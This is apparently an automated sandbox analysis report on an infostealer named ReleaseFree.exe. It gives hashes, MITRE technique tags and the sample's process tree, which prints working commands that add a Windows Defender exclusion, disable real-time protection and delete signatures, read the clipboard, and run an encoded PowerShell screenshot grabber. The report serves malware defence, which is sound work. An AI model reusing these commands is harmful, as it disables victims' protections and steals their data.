af5394d0a237e20e6e21951a42116e9e839b5b793f178871e3e84b831efef461

Analysis

max time kernel
14s
max time network
14s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
03/02/2025, 18:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ReleaseFree.exe
Size

23.0MB
MD5

3020b18136d688f9c5a9b471e5b2f2de
SHA1

76eab9fc91c85612ea564525b51dd4f0cd039ddb
SHA256

af5394d0a237e20e6e21951a42116e9e839b5b793f178871e3e84b831efef461
SHA512

2b8c01784b3787f7e2d58ce1ee02c79633c7b3b28125b28a57cf6634109f18332bbfa2db63c035da0ec0d560e41286e8db050e6701b390f54c0745d53d48a10c
SSDEEP

196608:6GLjv+bhqNVoBLD7fEXEoYbiIv9uvvk9fIiZ1x:7L+9qz8LD7fEUbiIPQgj

Score

8^/10

collection defense_evasion discovery execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3100	powershell.exe
760	powershell.exe
340	powershell.exe
2160	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
3480	cmd.exe
3344	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2744	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe
4848	ReleaseFree.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
5	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 4 IoCs

discovery

Process Discovery

T1057

pid	Process
2080	tasklist.exe
2440	tasklist.exe
4192	tasklist.exe
340	tasklist.exe

UPX packed file 45 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001900000002ab31-21.dat	upx
behavioral1/memory/4848-25-0x00007FFC56BD0000-0x00007FFC572A0000-memory.dmp	upx
behavioral1/files/0x001900000002ab18-27.dat	upx
behavioral1/memory/4848-32-0x00007FFC716E0000-0x00007FFC716EF000-memory.dmp	upx
behavioral1/memory/4848-30-0x00007FFC6B690000-0x00007FFC6B6B5000-memory.dmp	upx
behavioral1/files/0x001c00000002ab26-47.dat	upx
behavioral1/files/0x001900000002ab27-48.dat	upx
behavioral1/files/0x001900000002ab25-46.dat	upx
behavioral1/files/0x001900000002ab22-45.dat	upx
behavioral1/files/0x001900000002ab21-44.dat	upx
behavioral1/files/0x001900000002ab1f-43.dat	upx
behavioral1/files/0x001900000002ab1e-42.dat	upx
behavioral1/files/0x001a00000002ab17-41.dat	upx
behavioral1/files/0x001c00000002ab38-40.dat	upx
behavioral1/files/0x001900000002ab37-39.dat	upx
behavioral1/files/0x001900000002ab34-38.dat	upx
behavioral1/files/0x001900000002ab2e-35.dat	upx
behavioral1/files/0x001c00000002ab2c-34.dat	upx
behavioral1/files/0x001900000002ab2d-29.dat	upx
behavioral1/memory/4848-54-0x00007FFC6B660000-0x00007FFC6B68D000-memory.dmp	upx
behavioral1/memory/4848-56-0x00007FFC6DAE0000-0x00007FFC6DAF5000-memory.dmp	upx
behavioral1/memory/4848-58-0x00007FFC566A0000-0x00007FFC56BC2000-memory.dmp	upx
behavioral1/memory/4848-60-0x00007FFC6D9C0000-0x00007FFC6D9D9000-memory.dmp	upx
behavioral1/memory/4848-62-0x00007FFC6B630000-0x00007FFC6B654000-memory.dmp	upx
behavioral1/memory/4848-64-0x00007FFC68640000-0x00007FFC687B7000-memory.dmp	upx
behavioral1/memory/4848-66-0x00007FFC6C700000-0x00007FFC6C719000-memory.dmp	upx
behavioral1/memory/4848-70-0x00007FFC56BD0000-0x00007FFC572A0000-memory.dmp	upx
behavioral1/memory/4848-74-0x00007FFC6B690000-0x00007FFC6B6B5000-memory.dmp	upx
behavioral1/memory/4848-73-0x00007FFC68600000-0x00007FFC68633000-memory.dmp	upx
behavioral1/memory/4848-72-0x00007FFC67EA0000-0x00007FFC67F6D000-memory.dmp	upx
behavioral1/memory/4848-71-0x00007FFC716D0000-0x00007FFC716DD000-memory.dmp	upx
behavioral1/memory/4848-76-0x00007FFC6C980000-0x00007FFC6C98D000-memory.dmp	upx
behavioral1/memory/4848-78-0x00007FFC6B660000-0x00007FFC6B68D000-memory.dmp	upx
behavioral1/memory/4848-79-0x00007FFC67D80000-0x00007FFC67E9B000-memory.dmp	upx
behavioral1/memory/4848-103-0x00007FFC6DAE0000-0x00007FFC6DAF5000-memory.dmp	upx
behavioral1/memory/4848-104-0x00007FFC566A0000-0x00007FFC56BC2000-memory.dmp	upx
behavioral1/memory/4848-239-0x00007FFC6B630000-0x00007FFC6B654000-memory.dmp	upx
behavioral1/memory/4848-241-0x00007FFC68640000-0x00007FFC687B7000-memory.dmp	upx
behavioral1/memory/4848-257-0x00007FFC6C700000-0x00007FFC6C719000-memory.dmp	upx
behavioral1/memory/4848-262-0x00007FFC67EA0000-0x00007FFC67F6D000-memory.dmp	upx
behavioral1/memory/4848-281-0x00007FFC68600000-0x00007FFC68633000-memory.dmp	upx
behavioral1/memory/4848-282-0x00007FFC56BD0000-0x00007FFC572A0000-memory.dmp	upx
behavioral1/memory/4848-296-0x00007FFC67D80000-0x00007FFC67E9B000-memory.dmp	upx
behavioral1/memory/4848-287-0x00007FFC566A0000-0x00007FFC56BC2000-memory.dmp	upx
behavioral1/memory/4848-283-0x00007FFC6B690000-0x00007FFC6B6B5000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3592	WMIC.exe
4064	WMIC.exe
4496	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4544	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
3100	powershell.exe
2160	powershell.exe
3100	powershell.exe
2160	powershell.exe
3344	powershell.exe
3344	powershell.exe
1828	powershell.exe
1828	powershell.exe
3344	powershell.exe
1828	powershell.exe
760	powershell.exe
760	powershell.exe
996	powershell.exe
996	powershell.exe
340	powershell.exe
340	powershell.exe
3724	powershell.exe
3724	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2080	tasklist.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeIncreaseQuotaPrivilege	2132	WMIC.exe
Token: SeSecurityPrivilege	2132	WMIC.exe
Token: SeTakeOwnershipPrivilege	2132	WMIC.exe
Token: SeLoadDriverPrivilege	2132	WMIC.exe
Token: SeSystemProfilePrivilege	2132	WMIC.exe
Token: SeSystemtimePrivilege	2132	WMIC.exe
Token: SeProfSingleProcessPrivilege	2132	WMIC.exe
Token: SeIncBasePriorityPrivilege	2132	WMIC.exe
Token: SeCreatePagefilePrivilege	2132	WMIC.exe
Token: SeBackupPrivilege	2132	WMIC.exe
Token: SeRestorePrivilege	2132	WMIC.exe
Token: SeShutdownPrivilege	2132	WMIC.exe
Token: SeDebugPrivilege	2132	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2132	WMIC.exe
Token: SeRemoteShutdownPrivilege	2132	WMIC.exe
Token: SeUndockPrivilege	2132	WMIC.exe
Token: SeManageVolumePrivilege	2132	WMIC.exe
Token: 33	2132	WMIC.exe
Token: 34	2132	WMIC.exe
Token: 35	2132	WMIC.exe
Token: 36	2132	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2132	WMIC.exe
Token: SeSecurityPrivilege	2132	WMIC.exe
Token: SeTakeOwnershipPrivilege	2132	WMIC.exe
Token: SeLoadDriverPrivilege	2132	WMIC.exe
Token: SeSystemProfilePrivilege	2132	WMIC.exe
Token: SeSystemtimePrivilege	2132	WMIC.exe
Token: SeProfSingleProcessPrivilege	2132	WMIC.exe
Token: SeIncBasePriorityPrivilege	2132	WMIC.exe
Token: SeCreatePagefilePrivilege	2132	WMIC.exe
Token: SeBackupPrivilege	2132	WMIC.exe
Token: SeRestorePrivilege	2132	WMIC.exe
Token: SeShutdownPrivilege	2132	WMIC.exe
Token: SeDebugPrivilege	2132	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2132	WMIC.exe
Token: SeRemoteShutdownPrivilege	2132	WMIC.exe
Token: SeUndockPrivilege	2132	WMIC.exe
Token: SeManageVolumePrivilege	2132	WMIC.exe
Token: 33	2132	WMIC.exe
Token: 34	2132	WMIC.exe
Token: 35	2132	WMIC.exe
Token: 36	2132	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3592	WMIC.exe
Token: SeSecurityPrivilege	3592	WMIC.exe
Token: SeTakeOwnershipPrivilege	3592	WMIC.exe
Token: SeLoadDriverPrivilege	3592	WMIC.exe
Token: SeSystemProfilePrivilege	3592	WMIC.exe
Token: SeSystemtimePrivilege	3592	WMIC.exe
Token: SeProfSingleProcessPrivilege	3592	WMIC.exe
Token: SeIncBasePriorityPrivilege	3592	WMIC.exe
Token: SeCreatePagefilePrivilege	3592	WMIC.exe
Token: SeBackupPrivilege	3592	WMIC.exe
Token: SeRestorePrivilege	3592	WMIC.exe
Token: SeShutdownPrivilege	3592	WMIC.exe
Token: SeDebugPrivilege	3592	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3592	WMIC.exe
Token: SeRemoteShutdownPrivilege	3592	WMIC.exe
Token: SeUndockPrivilege	3592	WMIC.exe
Token: SeManageVolumePrivilege	3592	WMIC.exe
Token: 33	3592	WMIC.exe
Token: 34	3592	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3264 wrote to memory of 4848	3264	ReleaseFree.exe	79
PID 3264 wrote to memory of 4848	3264	ReleaseFree.exe	79
PID 4848 wrote to memory of 2752	4848	ReleaseFree.exe	80
PID 4848 wrote to memory of 2752	4848	ReleaseFree.exe	80
PID 4848 wrote to memory of 2620	4848	ReleaseFree.exe	81
PID 4848 wrote to memory of 2620	4848	ReleaseFree.exe	81
PID 4848 wrote to memory of 4464	4848	ReleaseFree.exe	82
PID 4848 wrote to memory of 4464	4848	ReleaseFree.exe	82
PID 4848 wrote to memory of 1184	4848	ReleaseFree.exe	86
PID 4848 wrote to memory of 1184	4848	ReleaseFree.exe	86
PID 4848 wrote to memory of 668	4848	ReleaseFree.exe	88
PID 4848 wrote to memory of 668	4848	ReleaseFree.exe	88
PID 2620 wrote to memory of 3100	2620	cmd.exe	90
PID 2620 wrote to memory of 3100	2620	cmd.exe	90
PID 1184 wrote to memory of 2080	1184	cmd.exe	91
PID 1184 wrote to memory of 2080	1184	cmd.exe	91
PID 2752 wrote to memory of 2160	2752	cmd.exe	92
PID 2752 wrote to memory of 2160	2752	cmd.exe	92
PID 4464 wrote to memory of 1592	4464	cmd.exe	93
PID 4464 wrote to memory of 1592	4464	cmd.exe	93
PID 668 wrote to memory of 2132	668	cmd.exe	94
PID 668 wrote to memory of 2132	668	cmd.exe	94
PID 4848 wrote to memory of 1812	4848	ReleaseFree.exe	96
PID 4848 wrote to memory of 1812	4848	ReleaseFree.exe	96
PID 1812 wrote to memory of 4736	1812	cmd.exe	98
PID 1812 wrote to memory of 4736	1812	cmd.exe	98
PID 4848 wrote to memory of 2016	4848	ReleaseFree.exe	99
PID 4848 wrote to memory of 2016	4848	ReleaseFree.exe	99
PID 2016 wrote to memory of 1296	2016	cmd.exe	101
PID 2016 wrote to memory of 1296	2016	cmd.exe	101
PID 4848 wrote to memory of 1208	4848	ReleaseFree.exe	102
PID 4848 wrote to memory of 1208	4848	ReleaseFree.exe	102
PID 1208 wrote to memory of 3592	1208	cmd.exe	104
PID 1208 wrote to memory of 3592	1208	cmd.exe	104
PID 4848 wrote to memory of 5008	4848	ReleaseFree.exe	105
PID 4848 wrote to memory of 5008	4848	ReleaseFree.exe	105
PID 5008 wrote to memory of 4064	5008	cmd.exe	107
PID 5008 wrote to memory of 4064	5008	cmd.exe	107
PID 4848 wrote to memory of 572	4848	ReleaseFree.exe	108
PID 4848 wrote to memory of 572	4848	ReleaseFree.exe	108
PID 4848 wrote to memory of 904	4848	ReleaseFree.exe	109
PID 4848 wrote to memory of 904	4848	ReleaseFree.exe	109
PID 4848 wrote to memory of 464	4848	ReleaseFree.exe	112
PID 4848 wrote to memory of 464	4848	ReleaseFree.exe	112
PID 904 wrote to memory of 4192	904	cmd.exe	114
PID 904 wrote to memory of 4192	904	cmd.exe	114
PID 572 wrote to memory of 2440	572	cmd.exe	115
PID 572 wrote to memory of 2440	572	cmd.exe	115
PID 4848 wrote to memory of 3480	4848	ReleaseFree.exe	116
PID 4848 wrote to memory of 3480	4848	ReleaseFree.exe	116
PID 4848 wrote to memory of 4684	4848	ReleaseFree.exe	117
PID 4848 wrote to memory of 4684	4848	ReleaseFree.exe	117
PID 4848 wrote to memory of 460	4848	ReleaseFree.exe	118
PID 4848 wrote to memory of 460	4848	ReleaseFree.exe	118
PID 464 wrote to memory of 996	464	cmd.exe	122
PID 464 wrote to memory of 996	464	cmd.exe	122
PID 4848 wrote to memory of 5016	4848	ReleaseFree.exe	124
PID 4848 wrote to memory of 5016	4848	ReleaseFree.exe	124
PID 4684 wrote to memory of 340	4684	cmd.exe	125
PID 4684 wrote to memory of 340	4684	cmd.exe	125
PID 3480 wrote to memory of 3344	3480	cmd.exe	127
PID 3480 wrote to memory of 3344	3480	cmd.exe	127
PID 4848 wrote to memory of 1116	4848	ReleaseFree.exe	128
PID 4848 wrote to memory of 1116	4848	ReleaseFree.exe	128

C:\Users\Admin\AppData\Local\Temp\ReleaseFree.exe
"C:\Users\Admin\AppData\Local\Temp\ReleaseFree.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3264
- C:\Users\Admin\AppData\Local\Temp\ReleaseFree.exe
  "C:\Users\Admin\AppData\Local\Temp\ReleaseFree.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ReleaseFree.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2752
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ReleaseFree.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2620
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('HWID PROTECT', 0, 'HWID #?', 0+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4464
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('HWID PROTECT', 0, 'HWID #?', 0+16);close()"
      4⤵
      PID:1592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1184
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:668
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1812
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2016
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:1296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1208
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious use of AdjustPrivilegeToken
      PID:3592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:572
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:904
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:464
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      PID:996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:3480
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:3344
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4684
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:460
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:5016
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1116
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 